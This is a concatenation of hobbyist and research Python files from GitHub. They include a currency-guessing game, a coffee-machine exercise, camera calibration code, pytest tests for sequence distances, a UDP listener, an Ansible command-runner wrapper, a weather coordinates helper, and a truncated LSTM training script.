\"GtUN8c7rPHjLTS6jf1iJvY83b918PKPQ\"}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n status_code = response.status_code\n result = response.text\n class Payload(object):\n def __init__(self, result):\n self.__dict__ = json.loads(result)\n\n p = Payload(result)\n return p\n\n\ndef random_dollar():\n dollar = random.randint(1, 100)\n return int(dollar)\n\n\ndef get_money_interval(d, t):\n # Will get the current currency rate from USD to ILS and will generate an interval as follows:\n # a. for given difficulty d, and value of money t the interval will be: (t- (5-d), t+ (5-d))\n c = CurrencyConverter()\n lower_bound = t - (5 - d)\n upper_bound = t + (5 - d)\n # print(\"\\n\", lower_bound, upper_bound)\n lower_bound_con = c.convert(lower_bound, 'USD', 'ILS')\n upper_bound_con = c.convert(upper_bound, 'USD', 'ILS')\n # print(\"\\n\", lower_bound_con, upper_bound_con)\n # interval_after_exchange = (currency_rate(lower_bound).result, currency_rate(upper_bound).result)\n interval_after_exchange = (lower_bound_con, upper_bound_con)\n return interval_after_exchange\n\n\ndef get_guess_from_user(t):\n # A method to prompt a guess from the user to enter a guess of value to a given amount of USD\n con = True\n while con:\n money_guess = input(f\"Hi,Do you Think You Can Guess how much {t} is in ILS rate ? \\n\")\n if money_guess.isnumeric():\n sleep(0.1)\n return money_guess\n else:\n print(\"Its not a number please try again\")\n sleep(0.1)\n continue\n sleep(0.1)\n\n\ndef play(diff):\n # Will call the functions above and play the game. Will return True/False if the user lost or won.\n money = random_dollar()\n interval = get_money_interval(diff, money)\n\n more = True\n while more:\n # get a guess\n guess = get_guess_from_user(money)\n if int(interval[0]) <= int(guess) <= int(interval[1]):\n print(f\"Wow you are A Genius good guess !!! the exect currency is {currency_rate(money).result}\")\n sleep(2)\n Screen_cleaner()\n more = False\n sleep(0.1)\n return True\n\n else:\n print(\"nice try - better luck next time\")\n print(\"You are most welcome to try again\")\n x = input(\"Please Press 'Enter' to try again or any other key to exit \\n\")\n if x == '':\n sleep(0.1)\n continue\n else:\n print(\"Thank you - Hope to see you soon - Bye Bye :) \")\n sleep(2)\n Screen_cleaner()\n more = False\n sleep(0.1)\n sleep(0.1)\n return False\n\n\n\n","repo_name":"iatid23/WorldOfGames","sub_path":"GameServer/CurrencyRouletteGame.py","file_name":"CurrencyRouletteGame.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41515126838","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0\n}\n\nexpresso = MENU['espresso']['ingredients']\nlatte = MENU['latte']['ingredients']\ncappuccino = MENU['cappuccino']['ingredients']\n\ndef validations (choice):\n\n if choice == 'expresso':\n if resources['water'] < expresso['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < expresso['coffee']:\n print('Sorry there is not enough coffee.')\n return False\n \n if choice == 'latte':\n if resources['water'] < latte['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < latte['coffee']:\n print('Sorry there is not enough coffee.')\n return False\n elif resources['milk'] < latte['milk']:\n print('Sorry there is not enough milk.')\n return False\n \n if choice == 'cappuccino':\n if resources['water'] < cappuccino['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < cappuccino['coffee']:\n print('Sorry there is not enough coffee.')\n return False\n elif resources['milk'] < cappuccino['milk']:\n print('Sorry there is not enough milk.')\n return False\n \n return True\n\ndef processCoins( choice ):\n\n if not validations(choice=choice):\n return\n \n print('Please insert coins.')\n quartersChoice = int(input('How many quarters?: '))\n dimesChoice = int(input('How many dimes:? '))\n nicklesChoice = int(input('How many nickles?: '))\n penniesChoice = int(input('How many pennies?: '))\n\n quarterTotal = 0.25 * quartersChoice \n dimesTotal = 0.10 * dimesChoice \n nicklesTotal = 0.05 * nicklesChoice \n penniesTotal = 0.01 * penniesChoice \n\n totalList = [ quarterTotal, dimesTotal, nicklesTotal, penniesTotal ]\n total = sum( totalList )\n return total\n\ndef checkTransaction(choice):\n expressoCost = MENU['espresso']['cost']\n latteCost = MENU['latte']['cost']\n cappuccinoCost = MENU['cappuccino']['cost']\n \n if choice == 'expresso':\n\n if expressoCost > processCoins(choice=choice):\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - expresso['coffee']\n resources['water'] = resources['water'] - expresso['water']\n resources['money'] = processCoins(choice=choice)\n\n elif choice == 'latte':\n if latteCost > processCoins(choice=choice):\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - latte['coffee']\n resources['milk'] = resources['milk'] - latte['milk']\n resources['water'] = resources['water'] - latte['water']\n resources['money'] = processCoins(choice=choice)\n\n elif choice == 'cappuccino':\n if cappuccinoCost > processCoins(choice=choice):\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - cappuccino['coffee']\n resources['milk'] = resources['milk'] - cappuccino['milk']\n resources['water'] = resources['water'] - cappuccino['water']\n resources['money'] = processCoins(choice=choice)\n \n\ndef report():\n print(f\"Water: { resources['water']}ml \")\n print(f\"Milk: { resources['milk']}ml \")\n print(f\"Coffee: { resources['coffee']}g \")\n print(f\"Money: $ { resources['money'] }\")\n\ndef coffe_machine():\n should_run = True\n while should_run:\n print(resources)\n choice = input(\"What would you like? (expresso/latte/cappuccino): \").lower()\n if choice == 'expresso':\n checkTransaction(choice=choice)\n elif choice == 'latte':\n checkTransaction(choice=choice)\n elif choice == 'cappuccino':\n checkTransaction(choice=choice)\n elif choice == 'report':\n report()\n elif choice == 'off':\n should_run = False\n else:\n print('Choose a valid option')\n\ncoffe_machine()","repo_name":"kunjolee/bootcamp_100_python","sub_path":"15-coffe-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16170175346","text":"import numpy as np\nimport cv2\nimport pyzed.sl as sl\nfrom ReadData import read_alignment, read_calibration\nfrom Geometry import World_XY_from_uv_and_Z, inverse_perspective\nfrom utils import getBoxes\n\ndef Init():\n # Create a Camera object\n zed = sl.Camera()\n\n # Create a InitParameters object and set configuration parameters\n init_params = sl.InitParameters()\n init_params.camera_resolution = sl.RESOLUTION.RESOLUTION_HD1080 # Use HD1080 video mode\n init_params.camera_fps = 30 # Set fps at 30\n\n # Open the camera\n err = zed.open(init_params)\n if err != sl.ERROR_CODE.SUCCESS:\n exit(1)\n\n image_left = sl.Mat()\n runtime_parameters = sl.RuntimeParameters()\n\n return zed, image_left, runtime_parameters\n\ndef Record(zed, image_left, runtime_parameters):\n \n # Grab an image, a RuntimeParameters object must be given to grab()\n if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:\n # A new image is available if grab() returns SUCCESS\n # Each new frame is added to the SVO file\n \n zed.retrieve_image(image_left, sl.VIEW.VIEW_LEFT)\n # Get the timestamp at the time the image was captured\n timestamp = zed.get_timestamp(sl.TIME_REFERENCE.TIME_REFERENCE_CURRENT) \n print(\"Image resolution: {0} x {1} || Image timestamp: {2}\\n\".format(image_left.get_width(), image_left.get_height(),\n timestamp))\n\n # To recover data from sl.Mat to use it with opencv, we use the get_data() method\n # It returns a numpy array that can be used as a matrix with opencv\n img = image_left.get_data()\n\n # Close the camera\n #zed.close()\n\n return img\n\nzed, image_left, runtime_parameters = Init()\n\nwhile True:\n \n img = Record(zed, image_left, runtime_parameters)\n\n #cv2.imshow(\"Image\", img)\n # cv2.imwrite('Cones_img.png', img)\n #cv2.waitKey(100)\n\n imgpoints = getBoxes(img)\n u = [pixel[0] for pixel in imgpoints]\n v = [pixel[1] for pixel in imgpoints]\n imgpoints = [u, v]\n imgpixels = np.array(imgpoints, dtype=np.int)\n imgpoints = np.array(imgpoints, dtype=np.float64)\n\n # Load the camera parameters: \n # K - Camera matrix, d - Distortion coefficients vector,\n # R - Rotation matrix, t - Translation vector.\n\n K, d = read_calibration()\n Rinv, tinv = read_alignment()\n\n # We invert it to obtain the transformation from camera frame to world, which\n # is what OpenCV gives us by default.\n R, t = inverse_perspective(Rinv, tinv)\n\n N = imgpoints.shape[1]\n # Undistort use (1,N,2) shape so need to reshape the vector.\n imgpoints1 = imgpoints.reshape(1,N,2)\n points_undist = cv2.undistortPoints(imgpoints1, cameraMatrix=K, distCoeffs=d, dst=None, R=None, P=np.eye(3))\n points_undist = points_undist.reshape(N,2) # there is an extra level of array which we no longer need\n\n # Note that we passed in an identity matrix as the new camera matrix (\"P\"). We can pass\n # in any valid intrinsics matrix. The undistort function remaps the points to the new projection.\n # We have Z=0 since we chose points on the floor.\n positions = World_XY_from_uv_and_Z(points_undist, K=np.eye(3), R=R, t=t.reshape(3,1), Z=0.0)\n for i in range(len(positions)):\n cv2.putText(img, \"x:{}, y:{}\".format(positions[i][0], positions[i][1]),tuple(imgpixels[:,i]), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=0.6, color=(0,255,0))\n\n cv2.imshow('a',img)\n cv2.waitKey(1500)\n\n\n\n\n","repo_name":"TechnionAVFormula/Camera-Calibration","sub_path":"Perception.py","file_name":"Perception.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23968705931","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom sys import stderr\nfrom typing import Callable, NamedTuple\n\nimport pytest\nfrom utility import assert_eq_files\n\nfrom itaxotools.taxi2.distances import (\n Distance, DistanceHandler, DistanceMetric, Distances)\nfrom itaxotools.taxi2.sequences import Sequence\n\nTEST_DATA_DIR = Path(__file__).parent / Path(__file__).stem\n\n\nclass ReadTest(NamedTuple):\n fixture: Callable[[], Distances]\n input: str\n handler: DistanceHandler\n kwargs: dict = {}\n\n @property\n def input_path(self) -> Path:\n return TEST_DATA_DIR / self.input\n\n @property\n def fixed(self) -> Distances:\n return self.fixture()\n\n def validate(self) -> None:\n distances = Distances.fromPath(self.input_path, self.handler, **self.kwargs)\n generated_list = list(distances)\n fixed_list = list(self.fixed)\n assert len(fixed_list) == len(generated_list)\n for distance in fixed_list:\n assert distance in generated_list\n\n\nclass WriteTest(NamedTuple):\n fixture: Callable[[], Distances]\n output: str\n handler: DistanceHandler\n kwargs: dict = {}\n\n @property\n def fixed_path(self) -> Path:\n return TEST_DATA_DIR / self.output\n\n @property\n def fixed(self) -> Sequences:\n return self.fixture()\n\n def get_output_path(self, tmp_path) -> Path:\n return tmp_path / self.output\n\n def validate(self, output_path: Path) -> None:\n with self.handler(output_path, 'w', **self.kwargs) as file:\n for distance in self.fixed:\n file.write(distance)\n assert_eq_files(output_path, self.fixed_path)\n\n\nclass LabelTest(NamedTuple):\n metric: DistanceMetric\n label: str\n\n def check(self):\n assert self.metric == DistanceMetric.fromLabel(self.label)\n assert self.label == str(self.metric)\n\n\nclass MetricTest(NamedTuple):\n metric: DistanceMetric\n seq_x: str\n seq_y: str\n d: float\n precision: float = 0.0\n\n def check(self):\n x = Sequence('idx', self.seq_x)\n y = Sequence('idy', self.seq_y)\n r = self.metric.calculate(x, y)\n assert r.metric == self.metric\n assert r.x.id == 'idx'\n assert r.y.id == 'idy'\n if isinstance(r.d, float):\n assert abs(r.d - self.d) <= self.precision\n else:\n assert r.d == self.d\n assert r.d is None\n\n\nclass MetricFileTest(NamedTuple):\n file: str\n precision: float\n\n def get_metric_tests(self) -> iter[MetricTest]:\n path = TEST_DATA_DIR / self.file\n with DistanceHandler.Linear(path, 'r') as file:\n for d in file:\n yield MetricTest(d.metric, d.x.id, d.y.id, d.d, self.precision)\n\n\ndef distances_simple() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id2', None), 0.1),\n Distance(metric, Sequence('id1', None), Sequence('id3', None), 0.2),\n Distance(metric, Sequence('id1', None), Sequence('id4', None), 0.3),\n ])\n\n\ndef distances_multiple() -> Distances:\n return Distances([\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id2', None), 0.11),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id2', None), 0.12),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id2', None), 0.13),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id2', None), 0.14),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id2', None), 0.15),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id2', None), 0.16),\n\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id3', None), 0.21),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id3', None), 0.22),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id3', None), 0.23),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id3', None), 0.24),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id3', None), 0.25),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id3', None), 0.26),\n\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id4', None), 0.31),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id4', None), 0.32),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id4', None), 0.33),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id4', None), 0.34),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id4', None), 0.35),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id4', None), 0.36),\n ])\n\n\ndef distances_square() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id1', None), 0.0),\n Distance(metric, Sequence('id1', None), Sequence('id2', None), 0.1),\n Distance(metric, Sequence('id1', None), Sequence('id3', None), 0.2),\n\n Distance(metric, Sequence('id2', None), Sequence('id1', None), 0.1),\n Distance(metric, Sequence('id2', None), Sequence('id2', None), 0.0),\n Distance(metric, Sequence('id2', None), Sequence('id3', None), 0.3),\n\n Distance(metric, Sequence('id3', None), Sequence('id1', None), 0.2),\n Distance(metric, Sequence('id3', None), Sequence('id2', None), 0.3),\n Distance(metric, Sequence('id3', None), Sequence('id3', None), 0.0),\n ])\n\n\ndef distances_square_unknown() -> Distances:\n metric = DistanceMetric.Unknown()\n return Distances([\n Distance(metric, dis.x, dis.y, dis.d) for dis in distances_square()\n ])\n\n\ndef distances_rectangle() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id4', None), 0.14),\n Distance(metric, Sequence('id1', None), Sequence('id5', None), 0.15),\n Distance(metric, Sequence('id1', None), Sequence('id6', None), 0.16),\n Distance(metric, Sequence('id1', None), Sequence('id7', None), 0.17),\n Distance(metric, Sequence('id1', None), Sequence('id8', None), 0.18),\n Distance(metric, Sequence('id1', None), Sequence('id9', None), 0.19),\n\n Distance(metric, Sequence('id2', None), Sequence('id4', None), 0.24),\n Distance(metric, Sequence('id2', None), Sequence('id5', None), 0.25),\n Distance(metric, Sequence('id2', None), Sequence('id6', None), 0.26),\n Distance(metric, Sequence('id2', None), Sequence('id7', None), 0.27),\n Distance(metric, Sequence('id2', None), Sequence('id8', None), 0.28),\n Distance(metric, Sequence('id2', None), Sequence('id9', None), 0.29),\n\n Distance(metric, Sequence('id3', None), Sequence('id4', None), 0.34),\n Distance(metric, Sequence('id3', None), Sequence('id5', None), 0.35),\n Distance(metric, Sequence('id3', None), Sequence('id6', None), 0.36),\n Distance(metric, Sequence('id3', None), Sequence('id7', None), 0.37),\n Distance(metric, Sequence('id3', None), Sequence('id8', None), 0.38),\n Distance(metric, Sequence('id3', None), Sequence('id9', None), 0.39),\n ])\n\n\ndef distances_missing() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id1', None), 0.0),\n Distance(metric, Sequence('id1', None), Sequence('id2', None), None),\n\n Distance(metric, Sequence('id2', None), Sequence('id1', None), None),\n Distance(metric, Sequence('id2', None), Sequence('id2', None), 0.0),\n ])\n\n\ndef distances_extras() -> Distances:\n return Distances([\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.11),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.12),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.13),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.14),\n\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.21),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.22),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.23),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.24),\n\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.31),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.32),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.33),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n None),\n ])\n\n\nread_tests = [\n ReadTest(distances_simple, 'simple.linear', DistanceHandler.Linear),\n ReadTest(distances_multiple, 'multiple.linear', DistanceHandler.Linear),\n ReadTest(distances_missing, 'missing.linear', DistanceHandler.Linear),\n\n ReadTest(distances_square_unknown, 'square.matrix', DistanceHandler.Matrix),\n ReadTest(distances_square, 'square.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n ReadTest(distances_rectangle, 'rectangle.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n ReadTest(distances_missing, 'missing.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n\n ReadTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='seqid', idyHeader='id', tagX='_x', tagY='_y')),\n ReadTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxColumn=0, idyColumn=2, tagX='_x', tagY='_y')),\n]\n\n\nwrite_tests = [\n WriteTest(distances_simple, 'simple.linear', DistanceHandler.Linear,\n dict(formatter='{:.1f}')),\n WriteTest(distances_multiple, 'multiple.linear', DistanceHandler.Linear,\n dict(formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.linear', DistanceHandler.Linear,\n dict(formatter='{:.1f}')),\n\n WriteTest(distances_square, 'square.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.1f}')),\n WriteTest(distances_rectangle, 'rectangle.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.1f}')),\n\n WriteTest(distances_missing, 'missing.formatted.linear', DistanceHandler.Linear,\n dict(formatter='{:.2e}', missing='nan')),\n WriteTest(distances_missing, 'missing.formatted.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.2e}', missing='nan')),\n\n WriteTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='seqid', idyHeader='id', tagX='_x', tagY='_y', formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.formatted.linear', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='idx', idyHeader='idy', tagX='', tagY='', formatter='{:.2e}', missing='nan')),\n\n]\n\n\nlabel_tests = [\n LabelTest(DistanceMetric.Uncorrected(), 'p'),\n LabelTest(DistanceMetric.UncorrectedWithGaps(), 'p-gaps'),\n LabelTest(DistanceMetric.JukesCantor(), 'jc'),\n LabelTest(DistanceMetric.Kimura2P(), 'k2p'),\n LabelTest(DistanceMetric.NCD(), 'ncd'),\n LabelTest(DistanceMetric.NCD(), 'ncd'),\n LabelTest(DistanceMetric.BBC(0), 'bbc(0)'),\n LabelTest(DistanceMetric.BBC(1), 'bbc(1)'),\n]\n\n\nmetric_tests = [\n MetricTest(DistanceMetric.Uncorrected(), 'gg-ccnccta', 'ggaccaccaa', 1.0 / 8.0),\n MetricTest(DistanceMetric.UncorrectedWithGaps(), 'gg-ccnccta', 'ggaccaccaa', 2.0 / 9.0),\n MetricTest(DistanceMetric.Uncorrected(), '---', 'nnn', None),\n]\n\n\nmetric_file_tests = [\n MetricFileTest('metrics.tsv', 0.00051),\n]\n\n\n@pytest.mark.parametrize(\"test\", read_tests)\ndef test_read_distances(test: ReadTest) -> None:\n test.validate()\n\n\n@pytest.mark.parametrize(\"test\", write_tests)\ndef test_write_distances(test: WriteTest, tmp_path: Path) -> None:\n output_path = test.get_output_path(tmp_path)\n test.validate(output_path)\n\n\n@pytest.mark.parametrize(\"test\", label_tests)\ndef test_labels(test: LabelTest) -> None:\n test.check()\n\n\n@pytest.mark.parametrize(\"test\", metric_tests)\ndef test_metrics(test: MetricTest) -> None:\n test.check()\n\n\n@pytest.mark.parametrize(\"test\", metric_file_tests)\ndef test_metrics_from_files(test: MetricFileTest) -> None:\n stack = []\n for metric_test in test.get_metric_tests():\n try:\n metric_test.check()\n except AssertionError as a:\n stack.append(a)\n for a in stack:\n print(a.args[0], '\\n', file=stderr)\n assert len(stack) == 0\n","repo_name":"iTaxoTools/TaxI2","sub_path":"tests/test_distances.py","file_name":"test_distances.py","file_ext":"py","file_size_in_byte":14469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73249857172","text":"#!/usr/bin/python3\n# Austin Lolli\n# Lab 3 server.py\n#\n# Usage behavior: python3 server.py $port\n\nimport sys\nimport socket\n\ndef usage():\n usg_str = \"Usage: python3 {} $port\\n\"\n sys.stderr.write(usg_str.format(sys.argv[0]))\n exit(1)\n\ntry:\n port = int(sys.argv[1])\nexcept (IndexError, ValueError):\n usage()\n\ndef listen(port):\n # creates a socket called sudp using an internet connection and udp\n sudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # binds the socket to the address, using its own IP and designated port\n sudp.bind(('', port))\n # want to continually listen for messages\n while True:\n # recvfrom returns message and address of sender, store both\n message, addr = sudp.recvfrom(1024)\n message = message.decode()\n # if quit message received from talk program, close socket & stop listening\n if message == \"quit\":\n sudp.close()\n sys.exit(0)\n # any other message is printed as \"IP: message\"\n else:\n print(\"{}: {}\".format(addr[0], message))\n\nif __name__ == \"__main__\":\n listen(port)\n\n\n\n","repo_name":"austin-lolli/networks-labs","sub_path":"Lab4/listen.py","file_name":"listen.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4687202875","text":"\nimport json\nimport shutil\nfrom collections import namedtuple\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.vars.manager import VariableManager\nfrom ansible.inventory.manager import InventoryManager\nfrom ansible.playbook.play import Play\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom ansible.plugins.callback import CallbackBase\nimport ansible.constants as C\nimport uuid\nimport os,sys\nimport tempfile\nimport pdb\n\n\nclass ResultCallback(CallbackBase):\n \"\"\"A sample callback plugin used for performing an action as results come in\n\n If you want to collect all results into a single object for processing at\n the end of the execution, look into utilizing the ``json`` callback plugin\n or writing your own custom callback plugin\n \"\"\"\n\n def v2_runner_on_ok(self, result, **kwargs):\n \"\"\"Print a json representation of the result\n\n This method could store the result in an instance attribute for retrieval later\n \"\"\"\n host = result._host\n sys.stdout.write(json.dumps({host.name: result._result}, indent=4))\n\nclass AnsibleApi:\n def __init__(self,hosts):\n self.filename = \"/tmp/{0}\".format(uuid.uuid4())\n self.tmp = open(self.filename,'a')\n self.tmp.write(hosts)\n self.tmp.close()\n Options = namedtuple('Options',\n ['connection', 'module_path', 'forks', 'become', 'become_method', 'become_user', 'check',\n 'diff'])\n # initialize needed objects\n self.loader = DataLoader()\n self.options = Options(connection='ssh', module_path=None, forks=100, become=None, become_method=None,\n become_user=None,\n check=False,\n diff=False)\n self.passwords = dict(vault_pass='secret')\n self.inventory = InventoryManager(loader=self.loader, sources=self.filename)\n self.variable_manager = VariableManager(loader=self.loader, inventory=self.inventory)\n self.hosts = hosts\n\n def run_cmd(self, cmd):\n # Instantiate our ResultCallback for handling results as they come in\n results_callback = ResultCallback()\n # create inventory and pass to var manager\n # use path to host config file as source or hosts in a comma separated string\n\n\n # create play with tasks\n play_source = dict(\n name=\"Ansible Play\",\n hosts='all',\n gather_facts='no',\n tasks=[\n dict(action=dict(module='shell', args=cmd), register='shell_out')\n ]\n )\n play = Play().load(play_source, variable_manager=self.variable_manager, loader=self.loader)\n\n # actually run it\n tqm = None\n try:\n tqm = TaskQueueManager(\n inventory=self.inventory,\n variable_manager=self.variable_manager,\n loader=self.loader,\n options=self.options,\n passwords=self.passwords,\n stdout_callback=results_callback, # Use our custom callback instead of the ``default`` callback plugin\n )\n result = tqm.run(play)\n return result\n finally:\n if tqm is not None:\n tqm.cleanup()\n os.remove(self.filename)\n # Remove ansible tmpdir\n shutil.rmtree(C.DEFAULT_LOCAL_TMP, True)","repo_name":"hiys/PYTHON","sub_path":"pythonScripts/PyScripts/ansible_api.py","file_name":"ansible_api.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31908068772","text":"from typing import Protocol\r\n\r\nfrom utils.exceptions import CantGetCoordinates\r\nfrom utils.schemas import Coordinates\r\n\r\n\r\ndef _parse_coordinate(*, coordinate_value: str | float | int) -> float:\r\n try:\r\n return float(coordinate_value)\r\n except ValueError:\r\n raise CantGetCoordinates\r\n\r\n\r\nclass CoordinatesSourceProtocol(Protocol):\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n raise NotImplementedError\r\n\r\n\r\nclass PlugSource(CoordinatesSourceProtocol):\r\n latitude = 55.755864\r\n longitude = 37.617698\r\n\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n return Coordinates(longitude=cls.longitude, latitude=cls.latitude)\r\n\r\n\r\nclass ConsoleSource(CoordinatesSourceProtocol):\r\n\r\n @classmethod\r\n def get_coordinates(cls) -> Coordinates:\r\n lat = input(\"Enter your latitude: \")\r\n lon = input(\"Enter your longitude: \")\r\n latitude = _parse_coordinate(coordinate_value=lat)\r\n longitude = _parse_coordinate(coordinate_value=lon)\r\n return Coordinates(longitude=longitude, latitude=latitude)\r\n\r\n\r\ndef get_coordinates(coordinates_source: CoordinatesSourceProtocol) -> Coordinates:\r\n return coordinates_source.get_coordinates()\r\n","repo_name":"quantum73/weather_cli","sub_path":"services/coordinates.py","file_name":"coordinates.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11021932443","text":"import model_chen_2019 as mc19\nimport oxfordDataLoader as odl\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\n# Note: Why do I need to re-import torch?\nis_cuda = torch.cuda.is_available()\nif is_cuda:\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n# The main area\nif __name__==\"__main__\":\n\n # -------------\n # Get the data:\n # batch_size = 16\n batch_size = 256 # from paper\n z = odl.OxfordDataset(window_samples=200, overlap_samples=190)\n loader = DataLoader(z, batch_size=batch_size, pin_memory=True)\n\n # ----------------\n # Setup the model:\n n_epochs = 10\n #lr = 0.01\n lr = 0.00001 # paper has 1e-5\n criterion = nn.MSELoss()\n\n input_size = 6\n hidden_size = 128 # 256\n num_layers = 3 # 2\n output_size = 3 # 4\n\n model = mc19.Chen_IEEE(input_size, hidden_size, num_layers, output_size)\n model.to(device)\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n hidden = None\n\n\n # Now train:\n for epoch in range(1, n_epochs+1):\n # Begin your epoch by zeroing your gradients in\n # your optimizer (why?)\n optimizer.zero_grad()\n\n for batch_idx, sample in enumerate(loader):\n\n # Concatenate inputs attitude and acceleration\n # from the sensor along the 2nd dimension,\n # which is basically the index for the data group\n\n # Data in should be {acc, omega} both 3-d vectors\n 